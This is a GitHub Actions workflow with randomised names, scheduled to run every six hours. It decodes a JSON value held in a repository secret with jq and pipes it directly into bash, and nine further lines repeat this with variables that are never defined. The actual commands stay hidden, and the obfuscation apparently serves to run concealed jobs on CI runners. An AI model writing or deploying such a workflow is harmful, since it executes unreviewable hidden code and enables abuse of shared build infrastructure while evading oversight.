name: yanfusu1932

on:
  workflow_dispatch:
  schedule:
    - cron: '50 5/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: yanfusu1932
        env:
          oj92: ${{ secrets.oj92 }}
        run: |
          echo $oj92 | jq -r .hetpx912 | /bin/bash
          echo $fiw7 | jq -r .wu895 | /bin/bash
          echo $k94374 | jq -r .u4924 | /bin/bash
          echo $d8799 | jq -r .pxkf8 | /bin/bash
          echo $g10733 | jq -r .qvhu1840 | /bin/bash
          echo $zokjq2 | jq -r .ln28 | /bin/bash
          echo $n5 | jq -r .itxo8456 | /bin/bash
          echo $nlil3639 | jq -r .ygvhw7520 | /bin/bash
          echo $hloht20160 | jq -r .ods624 | /bin/bash
          echo $kg39693 | jq -r .wmv637 | /bin/bash

